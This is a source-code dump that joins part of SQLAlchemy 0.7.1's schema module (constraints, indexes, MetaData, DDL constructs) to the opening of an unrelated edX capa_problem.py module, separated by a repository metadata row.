Defines a single column or composite FOREIGN KEY ... REFERENCES
constraint. For a no-frills, single column foreign key, adding a
:class:`.ForeignKey` to the definition of a :class:`.Column` is a shorthand
equivalent for an unnamed, single column :class:`.ForeignKeyConstraint`.
Examples of foreign key configuration are in :ref:`metadata_foreignkeys`.
"""
__visit_name__ = 'foreign_key_constraint'
def __init__(self, columns, refcolumns, name=None, onupdate=None,
ondelete=None, deferrable=None, initially=None, use_alter=False,
link_to_name=False, table=None):
"""Construct a composite-capable FOREIGN KEY.
:param columns: A sequence of local column names. The named columns
must be defined and present in the parent Table. The names should
match the ``key`` given to each column (defaults to the name) unless
``link_to_name`` is True.
:param refcolumns: A sequence of foreign column names or Column
objects. The columns must all be located within the same Table.
:param name: Optional, the in-database name of the key.
:param onupdate: Optional string. If set, emit ON UPDATE <value> when
issuing DDL for this constraint. Typical values include CASCADE,
DELETE and RESTRICT.
:param ondelete: Optional string. If set, emit ON DELETE <value> when
issuing DDL for this constraint. Typical values include CASCADE,
DELETE and RESTRICT.
:param deferrable: Optional bool. If set, emit DEFERRABLE or NOT
DEFERRABLE when issuing DDL for this constraint.
:param initially: Optional string. If set, emit INITIALLY <value> when
issuing DDL for this constraint.
:param link_to_name: if True, the string name given in ``column`` is
the rendered name of the referenced column, not its locally assigned
``key``.
:param use_alter: If True, do not emit the DDL for this constraint as
part of the CREATE TABLE definition. Instead, generate it via an
ALTER TABLE statement issued after the full collection of tables
have been created, and drop it via an ALTER TABLE statement before
the full collection of tables are dropped. This is shorthand for the
usage of :class:`.AddConstraint` and :class:`.DropConstraint` applied
as "after-create" and "before-drop" events on the MetaData object.
This is normally used to generate/drop constraints on objects that
are mutually dependent on each other.
"""
super(ForeignKeyConstraint, self).\
__init__(name, deferrable, initially)
self.onupdate = onupdate
self.ondelete = ondelete
self.link_to_name = link_to_name
if self.name is None and use_alter:
raise exc.ArgumentError("Alterable Constraint requires a name")
self.use_alter = use_alter
self._elements = util.OrderedDict()
# standalone ForeignKeyConstraint - create
# associated ForeignKey objects which will be applied to hosted
# Column objects (in col.foreign_keys), either now or when attached
# to the Table for string-specified names
for col, refcol in zip(columns, refcolumns):
self._elements[col] = ForeignKey(
refcol,
_constraint=self,
name=self.name,
onupdate=self.onupdate,
ondelete=self.ondelete,
use_alter=self.use_alter,
link_to_name=self.link_to_name
)
if table is not None:
self._set_parent_with_dispatch(table)
@property
def columns(self):
return self._elements.keys()
@property
def elements(self):
return self._elements.values()
def _set_parent(self, table):
super(ForeignKeyConstraint, self)._set_parent(table)
for col, fk in self._elements.iteritems():
# string-specified column names now get
# resolved to Column objects
if isinstance(col, basestring):
col = table.c[col]
if not hasattr(fk, 'parent') or \
fk.parent is not col:
fk._set_parent_with_dispatch(col)
if self.use_alter:
def supports_alter(ddl, event, schema_item, bind, **kw):
return table in set(kw['tables']) and \
bind.dialect.supports_alter
event.listen(table.metadata, "after_create", AddConstraint(self, on=supports_alter))
event.listen(table.metadata, "before_drop", DropConstraint(self, on=supports_alter))
def copy(self, **kw):
fkc = ForeignKeyConstraint(
[x.parent.name for x in self._elements.values()],
[x._get_colspec(**kw) for x in self._elements.values()],
name=self.name,
onupdate=self.onupdate,
ondelete=self.ondelete,
use_alter=self.use_alter,
deferrable=self.deferrable,
initially=self.initially,
link_to_name=self.link_to_name
)
fkc.dispatch._update(self.dispatch)
return fkc
class PrimaryKeyConstraint(ColumnCollectionConstraint):
"""A table-level PRIMARY KEY constraint.
Defines a single column or composite PRIMARY KEY constraint. For a
no-frills primary key, adding ``primary_key=True`` to one or more
``Column`` definitions is a shorthand equivalent for an unnamed single- or
multiple-column PrimaryKeyConstraint.
"""
__visit_name__ = 'primary_key_constraint'
def _set_parent(self, table):
super(PrimaryKeyConstraint, self)._set_parent(table)
if table.primary_key in table.constraints:
table.constraints.remove(table.primary_key)
table.primary_key = self
table.constraints.add(self)
for c in self.columns:
c.primary_key = True
def _replace(self, col):
self.columns.replace(col)
class UniqueConstraint(ColumnCollectionConstraint):
"""A table-level UNIQUE constraint.
Defines a single column or composite UNIQUE constraint. For a no-frills,
single column constraint, adding ``unique=True`` to the ``Column``
definition is a shorthand equivalent for an unnamed, single column
UniqueConstraint.
"""
__visit_name__ = 'unique_constraint'
class Index(ColumnCollectionMixin, SchemaItem):
"""A table-level INDEX.
Defines a composite (one or more column) INDEX. For a no-frills, single
column index, adding ``index=True`` to the ``Column`` definition is
a shorthand equivalent for an unnamed, single column Index.
"""
__visit_name__ = 'index'
def __init__(self, name, *columns, **kw):
"""Construct an index object.
:param name:
The name of the index
:param \*columns:
Columns to include in the index. All columns must belong to the same
table.
:param unique:
Defaults to False: create a unique index.
:param \**kw:
Other keyword arguments may be interpreted by specific dialects.
"""
self.table = None
# will call _set_parent() if table-bound column
# objects are present
ColumnCollectionMixin.__init__(self, *columns)
self.name = name
self.unique = kw.pop('unique', False)
self.kwargs = kw
def _set_parent(self, table):
ColumnCollectionMixin._set_parent(self, table)
if self.table is not None and table is not self.table:
raise exc.ArgumentError(
"Index '%s' is against table '%s', and "
"cannot be associated with table '%s'." % (
self.name,
self.table.description,
table.description
)
)
self.table = table
for c in self.columns:
if c.table != self.table:
raise exc.ArgumentError(
"Column '%s' is not part of table '%s'." %
(c, self.table.description)
)
table.indexes.add(self)
@property
def bind(self):
"""Return the connectable associated with this Index."""
return self.table.bind
def create(self, bind=None):
"""Issue a ``CREATE`` statement for this
:class:`.Index`, using the given :class:`.Connectable`
for connectivity.
See also :meth:`.MetaData.create_all`.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaGenerator, self)
return self
def drop(self, bind=None):
"""Issue a ``DROP`` statement for this
:class:`.Index`, using the given :class:`.Connectable`
for connectivity.
See also :meth:`.MetaData.drop_all`.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaDropper, self)
def __repr__(self):
return 'Index("%s", %s%s)' % (
self.name,
', '.join(repr(c) for c in self.columns),
(self.unique and ', unique=True') or '')
class MetaData(SchemaItem):
"""A collection of Tables and their associated schema constructs.
Holds a collection of Tables and an optional binding to an ``Engine`` or
``Connection``. If bound, the :class:`~sqlalchemy.schema.Table` objects
in the collection and their columns may participate in implicit SQL
execution.
The `Table` objects themselves are stored in the `metadata.tables`
dictionary.
The ``bind`` property may be assigned to dynamically. A common pattern is
to start unbound and then bind later when an engine is available::
metadata = MetaData()
# define tables
Table('mytable', metadata, ...)
# connect to an engine later, perhaps after loading a URL from a
# configuration file
metadata.bind = an_engine
MetaData is a thread-safe object after tables have been explicitly defined
or loaded via reflection.
.. index::
single: thread safety; MetaData
"""
__visit_name__ = 'metadata'
def __init__(self, bind=None, reflect=False):
"""Create a new MetaData object.
:param bind:
An Engine or Connection to bind to. May also be a string or URL
instance, these are passed to create_engine() and this MetaData will
be bound to the resulting engine.
:param reflect:
Optional, automatically load all tables from the bound database.
Defaults to False. ``bind`` is required when this option is set.
For finer control over loaded tables, use the ``reflect`` method of
``MetaData``.
"""
self.tables = util.immutabledict()
self._schemas = set()
self._sequences = {}
self.bind = bind
if reflect:
if not bind:
raise exc.ArgumentError(
"A bind must be supplied in conjunction "
"with reflect=True")
self.reflect()
def __repr__(self):
return 'MetaData(%r)' % self.bind
def __contains__(self, table_or_key):
if not isinstance(table_or_key, basestring):
table_or_key = table_or_key.key
return table_or_key in self.tables
def _add_table(self, name, schema, table):
key = _get_table_key(name, schema)
dict.__setitem__(self.tables, key, table)
if schema:
self._schemas.add(schema)
def _remove_table(self, name, schema):
key = _get_table_key(name, schema)
dict.pop(self.tables, key, None)
if self._schemas:
self._schemas = set([t.schema
for t in self.tables.values()
if t.schema is not None])
def __getstate__(self):
return {'tables': self.tables, 'schemas':self._schemas,
'sequences':self._sequences}
def __setstate__(self, state):
self.tables = state['tables']
self._bind = None
self._sequences = state['sequences']
self._schemas = state['schemas']
def is_bound(self):
"""True if this MetaData is bound to an Engine or Connection."""
return self._bind is not None
def bind(self):
"""An Engine or Connection to which this MetaData is bound.
This property may be assigned an ``Engine`` or ``Connection``, or
assigned a string or URL to automatically create a basic ``Engine``
for this bind with ``create_engine()``.
"""
return self._bind
def _bind_to(self, bind):
"""Bind this MetaData to an Engine, Connection, string or URL."""
if isinstance(bind, (basestring, url.URL)):
from sqlalchemy import create_engine
self._bind = create_engine(bind)
else:
self._bind = bind
bind = property(bind, _bind_to)
def clear(self):
"""Clear all Table objects from this MetaData."""
dict.clear(self.tables)
self._schemas.clear()
def remove(self, table):
"""Remove the given Table object from this MetaData."""
self._remove_table(table.name, table.schema)
@property
def sorted_tables(self):
"""Returns a list of ``Table`` objects sorted in order of
dependency.
"""
return sqlutil.sort_tables(self.tables.itervalues())
def reflect(self, bind=None, schema=None, views=False, only=None):
"""Load all available table definitions from the database.
Automatically creates ``Table`` entries in this ``MetaData`` for any
table available in the database but not yet present in the
``MetaData``. May be called multiple times to pick up tables recently
added to the database, however no special action is taken if a table
in this ``MetaData`` no longer exists in the database.
:param bind:
A :class:`~sqlalchemy.engine.base.Connectable` used to access the
database; if None, uses the existing bind on this ``MetaData``, if
any.
:param schema:
Optional, query and reflect tables from an alterate schema.
:param views:
If True, also reflect views.
:param only:
Optional. Load only a sub-set of available named tables. May be
specified as a sequence of names or a callable.
If a sequence of names is provided, only those tables will be
reflected. An error is raised if a table is requested but not
available. Named tables already present in this ``MetaData`` are
ignored.
If a callable is provided, it will be used as a boolean predicate to
filter the list of potential table names. The callable is called
with a table name and this ``MetaData`` instance as positional
arguments and should return a true value for any table to reflect.
"""
reflect_opts = {'autoload': True}
if bind is None:
bind = _bind_or_error(self)
conn = None
else:
reflect_opts['autoload_with'] = bind
conn = bind.contextual_connect()
if schema is not None:
reflect_opts['schema'] = schema
try:
available = util.OrderedSet(bind.engine.table_names(schema,
connection=conn))
if views:
available.update(
bind.dialect.get_view_names(conn or bind, schema)
)
current = set(self.tables.iterkeys())
if only is None:
load = [name for name in available if name not in current]
elif util.callable(only):
load = [name for name in available
if name not in current and only(name, self)]
else:
missing = [name for name in only if name not in available]
if missing:
s = schema and (" schema '%s'" % schema) or ''
raise exc.InvalidRequestError(
'Could not reflect: requested table(s) not available '
'in %s%s: (%s)' %
(bind.engine.url, s, ', '.join(missing)))
load = [name for name in only if name not in current]
for name in load:
Table(name, self, **reflect_opts)
finally:
if conn is not None and \
conn is not bind:
conn.close()
def append_ddl_listener(self, event_name, listener):
"""Append a DDL event listener to this ``MetaData``.
Deprecated. See :class:`.DDLEvents`.
"""
def adapt_listener(target, connection, **kw):
listener(event, target, connection, **kw)
event.listen(self, "" + event_name.replace('-', '_'), adapt_listener)
def create_all(self, bind=None, tables=None, checkfirst=True):
"""Create all tables stored in this metadata.
Conditional by default, will not attempt to recreate tables already
present in the target database.
:param bind:
A :class:`~sqlalchemy.engine.base.Connectable` used to access the
database; if None, uses the existing bind on this ``MetaData``, if
any.
:param tables:
Optional list of ``Table`` objects, which is a subset of the total
tables in the ``MetaData`` (others are ignored).
:param checkfirst:
Defaults to True, don't issue CREATEs for tables already present
in the target database.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaGenerator,
self,
checkfirst=checkfirst,
tables=tables)
def drop_all(self, bind=None, tables=None, checkfirst=True):
"""Drop all tables stored in this metadata.
Conditional by default, will not attempt to drop tables not present in
the target database.
:param bind:
A :class:`~sqlalchemy.engine.base.Connectable` used to access the
database; if None, uses the existing bind on this ``MetaData``, if
any.
:param tables:
Optional list of ``Table`` objects, which is a subset of the
total tables in the ``MetaData`` (others are ignored).
:param checkfirst:
Defaults to True, only issue DROPs for tables confirmed to be
present in the target database.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaDropper,
self,
checkfirst=checkfirst,
tables=tables)
class ThreadLocalMetaData(MetaData):
"""A MetaData variant that presents a different ``bind`` in every thread.
Makes the ``bind`` property of the MetaData a thread-local value, allowing
this collection of tables to be bound to different ``Engine``
implementations or connections in each thread.
The ThreadLocalMetaData starts off bound to None in each thread. Binds
must be made explicitly by assigning to the ``bind`` property or using
``connect()``. You can also re-bind dynamically multiple times per
thread, just like a regular ``MetaData``.
"""
__visit_name__ = 'metadata'
def __init__(self):
"""Construct a ThreadLocalMetaData."""
self.context = util.threading.local()
self.__engines = {}
super(ThreadLocalMetaData, self).__init__()
def bind(self):
"""The bound Engine or Connection for this thread.
This property may be assigned an Engine or Connection, or assigned a
string or URL to automatically create a basic Engine for this bind
with ``create_engine()``."""
return getattr(self.context, '_engine', None)
def _bind_to(self, bind):
"""Bind to a Connectable in the caller's thread."""
if isinstance(bind, (basestring, url.URL)):
try:
self.context._engine = self.__engines[bind]
except KeyError:
from sqlalchemy import create_engine
e = create_engine(bind)
self.__engines[bind] = e
self.context._engine = e
else:
# TODO: this is squirrely. we shouldnt have to hold onto engines
# in a case like this
if bind not in self.__engines:
self.__engines[bind] = bind
self.context._engine = bind
bind = property(bind, _bind_to)
def is_bound(self):
"""True if there is a bind for this thread."""
return (hasattr(self.context, '_engine') and
self.context._engine is not None)
def dispose(self):
"""Dispose all bound engines, in all thread contexts."""
for e in self.__engines.itervalues():
if hasattr(e, 'dispose'):
e.dispose()
class SchemaVisitor(visitors.ClauseVisitor):
"""Define the visiting for ``SchemaItem`` objects."""
__traverse_options__ = {'schema_visitor':True}
class DDLElement(expression.Executable, expression.ClauseElement):
"""Base class for DDL expression constructs.
This class is the base for the general purpose :class:`.DDL` class,
as well as the various create/drop clause constructs such as
:class:`.CreateTable`, :class:`.DropTable`, :class:`.AddConstraint`,
etc.
:class:`.DDLElement` integrates closely with SQLAlchemy events,
introduced in :ref:`event_toplevel`. An instance of one is
itself an event receiving callable::
event.listen(
users,
'after_create',
AddConstraint(constraint).execute_if(dialect='postgresql')
)
See also:
:class:`.DDL`
:class:`.DDLEvents`
:ref:`event_toplevel`
:ref:`schema_ddl_sequences`
"""
_execution_options = expression.Executable.\
_execution_options.union({'autocommit':True})
target = None
on = None
dialect = None
callable_ = None
def execute(self, bind=None, target=None):
"""Execute this DDL immediately.
Executes the DDL statement in isolation using the supplied
:class:`~sqlalchemy.engine.base.Connectable` or
:class:`~sqlalchemy.engine.base.Connectable` assigned to the ``.bind``
property, if not supplied. If the DDL has a conditional ``on``
criteria, it will be invoked with None as the event.
:param bind:
Optional, an ``Engine`` or ``Connection``. If not supplied, a valid
:class:`~sqlalchemy.engine.base.Connectable` must be present in the
``.bind`` property.
:param target:
Optional, defaults to None. The target SchemaItem for the
execute call. Will be passed to the ``on`` callable if any,
and may also provide string expansion data for the
statement. See ``execute_at`` for more information.
"""
if bind is None:
bind = _bind_or_error(self)
if self._should_execute(target, bind):
return bind.execute(self.against(target))
else:
bind.engine.logger.info(
"DDL execution skipped, criteria not met.")
@util.deprecated("0.7", "See :class:`.DDLEvents`, as well as "
":meth:`.DDLElement.execute_if`.")
def execute_at(self, event_name, target):
"""Link execution of this DDL to the DDL lifecycle of a SchemaItem.
Links this ``DDLElement`` to a ``Table`` or ``MetaData`` instance,
executing it when that schema item is created or dropped. The DDL
statement will be executed using the same Connection and transactional
context as the Table create/drop itself. The ``.bind`` property of
this statement is ignored.
:param event:
One of the events defined in the schema item's ``.ddl_events``;
e.g. 'before-create', 'after-create', 'before-drop' or 'after-drop'
:param target:
The Table or MetaData instance for which this DDLElement will
be associated with.
A DDLElement instance can be linked to any number of schema items.
``execute_at`` builds on the ``append_ddl_listener`` interface of
:class:`.MetaData` and :class:`.Table` objects.
Caveat: Creating or dropping a Table in isolation will also trigger
any DDL set to ``execute_at`` that Table's MetaData. This may change
in a future release.
"""
def call_event(target, connection, **kw):
if self._should_execute_deprecated(event_name,
target, connection, **kw):
return connection.execute(self.against(target))
event.listen(target, "" + event_name.replace('-', '_'), call_event)
@expression._generative
def against(self, target):
"""Return a copy of this DDL against a specific schema item."""
self.target = target
@expression._generative
def execute_if(self, dialect=None, callable_=None, state=None):
"""Return a callable that will execute this
DDLElement conditionally.
Used to provide a wrapper for event listening::
event.listen(
metadata,
'before_create',
DDL("my_ddl").execute_if(dialect='postgresql')
)
:param dialect: May be a string, tuple or a callable
predicate. If a string, it will be compared to the name of the
executing database dialect::
DDL('something').execute_if(dialect='postgresql')
If a tuple, specifies multiple dialect names::
DDL('something').execute_if(dialect=('postgresql', 'mysql'))
:param callable_: A callable, which will be invoked with
four positional arguments as well as optional keyword
arguments:
:ddl:
This DDL element.
:target:
The :class:`.Table` or :class:`.MetaData` object which is the target of
this event. May be None if the DDL is executed explicitly.
:bind:
The :class:`.Connection` being used for DDL execution
:tables:
Optional keyword argument - a list of Table objects which are to
be created/ dropped within a MetaData.create_all() or drop_all()
method call.
:state:
Optional keyword argument - will be the ``state`` argument
passed to this function.
:checkfirst:
Keyword argument, will be True if the 'checkfirst' flag was
set during the call to ``create()``, ``create_all()``,
``drop()``, ``drop_all()``.
If the callable returns a true value, the DDL statement will be
executed.
:param state: any value which will be passed to the callable_
as the ``state`` keyword argument.
See also:
:class:`.DDLEvents`
:ref:`event_toplevel`
"""
self.dialect = dialect
self.callable_ = callable_
self.state = state
def _should_execute(self, target, bind, **kw):
if self.on is not None and \
not self._should_execute_deprecated(None, target, bind, **kw):
return False
if isinstance(self.dialect, basestring):
if self.dialect != bind.engine.name:
return False
elif isinstance(self.dialect, (tuple, list, set)):
if bind.engine.name not in self.dialect:
return False
if self.callable_ is not None and \
not self.callable_(self, target, bind, state=self.state, **kw):
return False
return True
def _should_execute_deprecated(self, event, target, bind, **kw):
if self.on is None:
return True
elif isinstance(self.on, basestring):
return self.on == bind.engine.name
elif isinstance(self.on, (tuple, list, set)):
return bind.engine.name in self.on
else:
return self.on(self, event, target, bind, **kw)
def __call__(self, target, bind, **kw):
"""Execute the DDL as a ddl_listener."""
if self._should_execute(target, bind, **kw):
return bind.execute(self.against(target))
def _check_ddl_on(self, on):
if (on is not None and
(not isinstance(on, (basestring, tuple, list, set)) and
not util.callable(on))):
raise exc.ArgumentError(
"Expected the name of a database dialect, a tuple "
"of names, or a callable for "
"'on' criteria, got type '%s'." % type(on).__name__)
def bind(self):
if self._bind:
return self._bind
def _set_bind(self, bind):
self._bind = bind
bind = property(bind, _set_bind)
def _generate(self):
s = self.__class__.__new__(self.__class__)
s.__dict__ = self.__dict__.copy()
return s
def _compiler(self, dialect, **kw):
"""Return a compiler appropriate for this ClauseElement, given a
Dialect."""
return dialect.ddl_compiler(dialect, self, **kw)
class DDL(DDLElement):
"""A literal DDL statement.
Specifies literal SQL DDL to be executed by the database. DDL objects
function as DDL event listeners, and can be subscribed to those events
listed in :class:`.DDLEvents`, using either :class:`.Table` or :class:`.MetaData`
objects as targets. Basic templating support allows a single DDL instance
to handle repetitive tasks for multiple tables.
Examples::
from sqlalchemy import event, DDL
tbl = Table('users', metadata, Column('uid', Integer))
event.listen(tbl, 'before_create', DDL('DROP TRIGGER users_trigger'))
spow = DDL('ALTER TABLE %(table)s SET secretpowers TRUE')
event.listen(tbl, 'after_create', spow.execute_if(dialect='somedb'))
drop_spow = DDL('ALTER TABLE users SET secretpowers FALSE')
connection.execute(drop_spow)
When operating on Table events, the following ``statement``
string substitions are available::
%(table)s - the Table name, with any required quoting applied
%(schema)s - the schema name, with any required quoting applied
%(fullname)s - the Table name including schema, quoted if needed
The DDL's "context", if any, will be combined with the standard
substutions noted above. Keys present in the context will override
the standard substitutions.
"""
__visit_name__ = "ddl"
def __init__(self, statement, on=None, context=None, bind=None):
"""Create a DDL statement.
:param statement:
A string or unicode string to be executed. Statements will be
processed with Python's string formatting operator. See the
``context`` argument and the ``execute_at`` method.
A literal '%' in a statement must be escaped as '%%'.
SQL bind parameters are not available in DDL statements.
:param on:
Deprecated. See :meth:`.DDLElement.execute_if`.
Optional filtering criteria. May be a string, tuple or a callable
predicate. If a string, it will be compared to the name of the
executing database dialect::
DDL('something', on='postgresql')
If a tuple, specifies multiple dialect names::
DDL('something', on=('postgresql', 'mysql'))
If a callable, it will be invoked with four positional arguments
as well as optional keyword arguments:
:ddl:
This DDL element.
:event:
The name of the event that has triggered this DDL, such as
'after-create' Will be None if the DDL is executed explicitly.
:target:
The ``Table`` or ``MetaData`` object which is the target of
this event. May be None if the DDL is executed explicitly.
:connection:
The ``Connection`` being used for DDL execution
:tables:
Optional keyword argument - a list of Table objects which are to
be created/ dropped within a MetaData.create_all() or drop_all()
method call.
If the callable returns a true value, the DDL statement will be
executed.
:param context:
Optional dictionary, defaults to None. These values will be
available for use in string substitutions on the DDL statement.
:param bind:
Optional. A :class:`~sqlalchemy.engine.base.Connectable`, used by
default when ``execute()`` is invoked without a bind argument.
See also:
:class:`.DDLEvents`
:mod:`sqlalchemy.event`
"""
if not isinstance(statement, basestring):
raise exc.ArgumentError(
"Expected a string or unicode SQL statement, got '%r'" %
statement)
self.statement = statement
self.context = context or {}
self._check_ddl_on(on)
self.on = on
self._bind = bind
def __repr__(self):
return '<%s@%s; %s>' % (
type(self).__name__, id(self),
', '.join([repr(self.statement)] +
['%s=%r' % (key, getattr(self, key))
for key in ('on', 'context')
if getattr(self, key)]))
def _to_schema_column(element):
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
if not isinstance(element, Column):
raise exc.ArgumentError("schema.Column object expected")
return element
def _to_schema_column_or_string(element):
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
return element
class _CreateDropBase(DDLElement):
"""Base class for DDL constucts that represent CREATE and DROP or
equivalents.
The common theme of _CreateDropBase is a single
``element`` attribute which refers to the element
to be created or dropped.
"""
def __init__(self, element, on=None, bind=None):
self.element = element
self._check_ddl_on(on)
self.on = on
self.bind = bind
def _create_rule_disable(self, compiler):
"""Allow disable of _create_rule using a callable.
Pass to _create_rule using
util.portable_instancemethod(self._create_rule_disable)
to retain serializability.
"""
return False
class CreateTable(_CreateDropBase):
"""Represent a CREATE TABLE statement."""
__visit_name__ = "create_table"
class DropTable(_CreateDropBase):
"""Represent a DROP TABLE statement."""
__visit_name__ = "drop_table"
class CreateSequence(_CreateDropBase):
"""Represent a CREATE SEQUENCE statement."""
__visit_name__ = "create_sequence"
class DropSequence(_CreateDropBase):
"""Represent a DROP SEQUENCE statement."""
__visit_name__ = "drop_sequence"
class CreateIndex(_CreateDropBase):
"""Represent a CREATE INDEX statement."""
__visit_name__ = "create_index"
class DropIndex(_CreateDropBase):
"""Represent a DROP INDEX statement."""
__visit_name__ = "drop_index"
class AddConstraint(_CreateDropBase):
"""Represent an ALTER TABLE ADD CONSTRAINT statement."""
__visit_name__ = "add_constraint"
def __init__(self, element, *args, **kw):
super(AddConstraint, self).__init__(element, *args, **kw)
element._create_rule = util.portable_instancemethod(
self._create_rule_disable)
class DropConstraint(_CreateDropBase):
"""Represent an ALTER TABLE DROP CONSTRAINT statement."""
__visit_name__ = "drop_constraint"
def __init__(self, element, cascade=False, **kw):
self.cascade = cascade
super(DropConstraint, self).__init__(element, **kw)
element._create_rule = util.portable_instancemethod(
self._create_rule_disable)
def _bind_or_error(schemaitem, msg=None):
bind = schemaitem.bind
if not bind:
name = schemaitem.__class__.__name__
label = getattr(schemaitem, 'fullname',
getattr(schemaitem, 'name', None))
if label:
item = '%s %r' % (name, label)
else:
item = name
if isinstance(schemaitem, (MetaData, DDL)):
bindable = "the %s's .bind" % name
else:
bindable = "this %s's .metadata.bind" % name
if msg is None:
msg = "The %s is not bound to an Engine or Connection. "\
"Execution can not proceed without a database to execute "\
"against. Either execute with an explicit connection or "\
"assign %s to enable implicit execution." % \
(item, bindable)
raise exc.UnboundExecutionError(msg)
return bind
|
eunchong/build
|
third_party/sqlalchemy_0_7_1/sqlalchemy/schema.py
|
Python
|
bsd-3-clause
| 113,306
|
#
# File: capa/capa_problem.py
#
# Nomenclature:
#
# A capa Problem is a collection of text and capa Response questions.
# Each Response may have one or more Input entry fields.
# The capa problem may include a solution.
#
"""
Main module which shows problems (of "capa" type).
This is used by capa_module.
"""
from copy import deepcopy
from datetime import datetime
import logging
import os.path
import re
from lxml import etree
from pytz import UTC
from xml.sax.saxutils import unescape
from capa.correctmap import CorrectMap
import capa.inputtypes as inputtypes
import capa.customrender as customrender
import capa.responsetypes as responsetypes
from capa.util import contextualize_text, convert_files_to_filenames
import capa.xqueue_interface as xqueue_interface
from capa.safe_exec import safe_exec
# extra things displayed after "show answers" is pressed
solution_tags = ['solution']
# these get captured as student responses
response_properties = ["codeparam", "responseparam", "answer", "openendedparam"]
# special problem tags which should be turned into innocuous HTML
html_transforms = {
'problem': {'tag': 'div'},
'text': {'tag': 'span'},
'math': {'tag': 'span'},
}
# These should be removed from HTML output, including all subelements
html_problem_semantics = [
"codeparam",
"responseparam",
"answer",
"script",
"hintgroup",
"openendedparam",
"openendedrubric",
]
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# main class for this module
class LoncapaSystem(object):
"""
An encapsulation of resources needed from the outside.
These interfaces are collected here so that a caller of LoncapaProblem
can provide these resources however make sense for their environment, and
this code can remain independent.
Attributes:
i18n: an object implementing the `gettext.Translations` interface so
that we can use `.ugettext` to localize strings.
See :class:`ModuleSystem` for documentation of other attributes.
"""
def __init__( # pylint: disable=invalid-name
self,
ajax_url,
anonymous_student_id,
cache,
can_execute_unsafe_code,
get_python_lib_zip,
DEBUG, # pylint: disable=invalid-name
filestore,
i18n,
node_path,
render_template,
seed, # Why do we do this if we have self.seed?
STATIC_URL, # pylint: disable=invalid-name
xqueue,
matlab_api_key=None
):
self.ajax_url = ajax_url
self.anonymous_student_id = anonymous_student_id
self.cache = cache
self.can_execute_unsafe_code = can_execute_unsafe_code
self.get_python_lib_zip = get_python_lib_zip
self.DEBUG = DEBUG # pylint: disable=invalid-name
self.filestore = filestore
self.i18n = i18n
self.node_path = node_path
self.render_template = render_template
self.seed = seed # Why do we do this if we have self.seed?
self.STATIC_URL = STATIC_URL # pylint: disable=invalid-name
self.xqueue = xqueue
self.matlab_api_key = matlab_api_key
class LoncapaProblem(object):
"""
Main class for capa Problems.
"""
def __init__(self, problem_text, id, capa_system, capa_module, # pylint: disable=redefined-builtin
state=None, seed=None):
"""
Initializes capa Problem.
Arguments:
problem_text (string): xml defining the problem.
id (string): identifier for this problem, often a filename (no spaces).
capa_system (LoncapaSystem): LoncapaSystem instance which provides OS,
rendering, user context, and other resources.
capa_module: instance needed to access runtime/logging
state (dict): containing the following keys:
- `seed` (int) random number generator seed
- `student_answers` (dict) maps input id to the stored answer for that input
- `correct_map` (CorrectMap) a map of each input to their 'correctness'
- `done` (bool) indicates whether or not this problem is considered done
- `input_state` (dict) maps input_id to a dictionary that holds the state for that input
seed (int): random number generator seed.
"""
## Initialize class variables from state
self.do_reset()
self.problem_id = id
self.capa_system = capa_system
self.capa_module = capa_module
state = state or {}
# Set seed according to the following priority:
# 1. Contained in problem's state
# 2. Passed into capa_problem via constructor
self.seed = state.get('seed', seed)
assert self.seed is not None, "Seed must be provided for LoncapaProblem."
self.student_answers = state.get('student_answers', {})
if 'correct_map' in state:
self.correct_map.set_dict(state['correct_map'])
self.done = state.get('done', False)
self.input_state = state.get('input_state', {})
# Convert startouttext and endouttext to proper <text></text>
problem_text = re.sub(r"startouttext\s*/", "text", problem_text)
problem_text = re.sub(r"endouttext\s*/", "/text", problem_text)
self.problem_text = problem_text
# parse problem XML file into an element tree
self.tree = etree.XML(problem_text)
self.make_xml_compatible(self.tree)
# handle any <include file="foo"> tags
self._process_includes()
# construct script processor context (eg for customresponse problems)
self.context = self._extract_context(self.tree)
# Pre-parse the XML tree: modifies it to add ID's and perform some in-place
# transformations. This also creates the dict (self.responders) of Response
# instances for each question in the problem. The dict has keys = xml subtree of
# Response, values = Response instance
self._preprocess_problem(self.tree)
if not self.student_answers: # True when student_answers is an empty dict
self.set_initial_display()
# dictionary of InputType objects associated with this problem
# input_id string -> InputType object
self.inputs = {}
# Run response late_transforms last (see MultipleChoiceResponse)
# Sort the responses to be in *_1 *_2 ... order.
responses = self.responders.values()
responses = sorted(responses, key=lambda resp: int(resp.id[resp.id.rindex('_') + 1:]))
for response in responses:
if hasattr(response, 'late_transforms'):
response.late_transforms(self)
self.extracted_tree = self._extract_html(self.tree)
def make_xml_compatible(self, tree):
"""
Adjust tree xml in-place for compatibility before creating
a problem from it.
The idea here is to provide a central point for XML translation,
for example, supporting an old XML format. At present, there just two translations.
1. <additional_answer> compatibility translation:
old: <additional_answer>ANSWER</additional_answer>
convert to
new: <additional_answer answer="ANSWER">OPTIONAL-HINT</addional_answer>
2. <optioninput> compatibility translation:
optioninput works like this internally:
<optioninput options="('yellow','blue','green')" correct="blue" />
With extended hints there is a new <option> tag, like this
<option correct="True">blue <optionhint>sky color</optionhint> </option>
This translation takes in the new format and synthesizes the old option= attribute
so all downstream logic works unchanged with the new <option> tag format.
"""
additionals = tree.xpath('//stringresponse/additional_answer')
for additional in additionals:
answer = additional.get('answer')
text = additional.text
if not answer and text: # trigger of old->new conversion
additional.set('answer', text)
additional.text = ''
for optioninput in tree.xpath('//optioninput'):
correct_option = None
child_options = []
for option_element in optioninput.findall('./option'):
option_name = option_element.text.strip()
if option_element.get('correct').upper() == 'TRUE':
correct_option = option_name
child_options.append("'" + option_name + "'")
if len(child_options) > 0:
options_string = '(' + ','.join(child_options) + ')'
optioninput.attrib.update({'options': options_string})
if correct_option:
optioninput.attrib.update({'correct': correct_option})
def do_reset(self):
"""
Reset internal state to unfinished, with no answers
"""
self.student_answers = dict()
self.correct_map = CorrectMap()
self.done = False
def set_initial_display(self):
"""
Set the student's answers to the responders' initial displays, if specified.
"""
initial_answers = dict()
for responder in self.responders.values():
if hasattr(responder, 'get_initial_display'):
initial_answers.update(responder.get_initial_display())
self.student_answers = initial_answers
def __unicode__(self):
